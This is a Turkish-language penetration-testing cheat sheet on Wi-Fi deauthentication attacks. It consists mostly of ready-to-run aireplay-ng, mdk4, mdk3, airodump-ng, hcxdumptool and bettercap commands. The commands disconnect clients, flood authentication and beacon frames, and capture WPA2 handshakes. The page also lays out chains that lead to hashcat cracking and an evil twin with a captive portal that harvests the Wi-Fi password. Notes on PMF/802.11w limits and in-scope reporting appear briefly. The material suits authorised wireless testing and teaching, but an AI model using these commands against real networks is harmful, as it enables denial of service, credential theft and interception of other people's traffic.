Deauthentication Saldırıları
ATT&CK T1498 difficulty: kolay
Korumasız 802.11 yönetim çerçevelerinde deauthentication / disassociation kimlik doğrulaması gerektirmez (802.11w/PMF yoksa). Saldırgan sahte deauth göndererek istemcileri AP’den düşürür; bu hem DoS’tur hem de yeniden bağlanma sırasında WPA2 handshake yakalama ve evil twin’e kayma için kullanılır.
Ön koşullar
Section titled “Ön koşullar”- Monitor + injection çalışan arayüz (aireplay-ng -9 testi)- Hedef AP BSSID + kanal; mümkünse istemci MAC- airodump aynı kanalda dinliyor olmalı (handshake için)- PMF (802.11w) zorunlu / WPA3 ağlarda klasik deauth etkisiz veya azalmış olabilirsudo aireplay-ng -9 wlan0monsudo iw dev wlan0mon set channel 6iwconfig wlan0mon # Mode:Monitor, Frequency doğru kanalDeauth gönderme
Section titled “Deauth gönderme”sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0monsudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0monsudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0monsudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c CLIENT wlan0monsudo mdk4 wlan0mon d -B AA:BB:CC:DD:EE:FFsudo mdk4 wlan0mon d -B AA:BB:CC:DD:EE:FF -S CC:DD:EE:FF:00:11echo "AA:BB:CC:DD:EE:FF" > ap.txtsudo mdk4 wlan0mon d -b ap.txtsudo mdk3 wlan0mon d -b blacklist.txtsudo bettercap -iface wlan0monHandshake / evil twin akışında kullanım
Section titled “Handshake / evil twin akışında kullanım”-
Dinlemeyi başlat — kanal ve BSSID kilitli:
Terminal window sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon -
Hedefli deauth — bağlı bir STATION seç; 3–10 deauth yeterli. Aşırı flood bazen istemciyi uzaklaştırır veya PMKID/EAPOL kaçırılır.
-
Doğrula — airodump sağ üstte WPA handshake: BSSID veya:
Terminal window hcxpcapngtool -o t.22000 cap-01.cap && grep WPA t.22000 -
Evil twin — gerçek AP’ye sürekli deauth + aynı SSID rogue AP; istemciler sahte AP’ye kayabilir (ikinci arayüz şart).
Disassoc ve diğer yönetim çerçeveleri
Section titled “Disassoc ve diğer yönetim çerçeveleri”sudo hcxdumptool -i wlan0mon -w dump.pcapng --enable_status=15sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF # auth DoSsudo mdk4 wlan0mon b -f ssid.txt # beacon floodChannel ve menzil ipuçları
Section titled “Channel ve menzil ipuçları”Yanlış kanal → "Injection is working" ama istemci düşmez5 GHz DFS / geniş CH → doğru center freq (iw set channel 36)İki anten / mesafe → AP ile istemci arasına fiziksel olarak yaklaşClient power-save → birkaç burst deauth tekrarlasudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0monPMF / 802.11w etkisi
Section titled “PMF / 802.11w etkisi”Optional PMF → bazı istemciler hâlâ düşerRequired PMF → korumalı yönetim çerçevesi; klasik aireplay genelde başarısızWPA3-SAE → PMF zorunlu varsayılan; deauth ile handshake zorla az işe yarar → PMKID/SAE saldırıları veya evil twin (farklı senaryo)Testte airodump / Wireshark’ta RSN capabilities PMF bit’lerine bakın.
DoS senaryosu (kapsam içi)
Section titled “DoS senaryosu (kapsam içi)”sudo timeout 15 aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0monRapor için: etkilenen BSSID, süre, istemci MAC (anonimleştirilmiş), ekran görüntüsü.
Komut üreteci
Section titled “Komut üreteci”aireplay · deauth
embedded toolsudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0monaireplay · deauth
Section titled “aireplay · deauth”Saldırı zinciri
Section titled “Saldırı zinciri”airodump kilitli kanal → aireplay-ng --deauth 5 -a AP -c CLIENT → WPA handshake yakalandı → hashcat 22000hostapd evil twin ayakta → mdk4 deauth gerçek BSSID → istemci rogue'a bağlanır → captive portal PSKPMF required → deauth bırak → hcxdumptool PMKID veya bekle doğal reconnect